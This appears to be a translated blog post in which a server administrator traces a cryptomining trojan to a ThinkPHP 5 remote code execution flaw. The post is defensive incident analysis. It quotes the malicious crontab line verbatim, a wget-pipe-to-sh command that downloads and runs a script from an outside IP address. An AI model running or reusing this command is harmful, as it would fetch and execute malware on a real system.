Yesterday I discovered that a server was suddenly slow The top shows that more than 100% of the CPU usage of several processes is
The execution command is:
/tmp/php -s /tmp/p2.conf
It is basically certain that it has been hung
The next step is to determine the source
last No login record
Kill these processes first, but they appear again after a few minutes
Let’s see what this Trojan wants to do first
netstat See This Trojan opened a port and established a connection with a certain IP abroad
But tcpdump did not find any data transfer for a while
What did he want to do?
Continue to check the log
I found in the cron log that the www user has a crontab timing operation, which is basically the problem
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
I downloaded a few problems and took a look. It seems to be a mining Trojan program
The www user on the server was created by installing lnmp. Looking at the source, it is probably a web vulnerability.
Look at the permissions of php under /tmp is www
Check the logs of several sites under lnmp and find that it is using the remote code execution vulnerability recently exposed in thinkphp 5
Vulnerability details: https://nosec.org/home/detail/2050.html
Fix the problem and solve it
But this site is a test site and the port listening is 8083. Could it be that hackers are now Can you start sniffing unconventional ports?
Source: https://www.simapple.com/425.html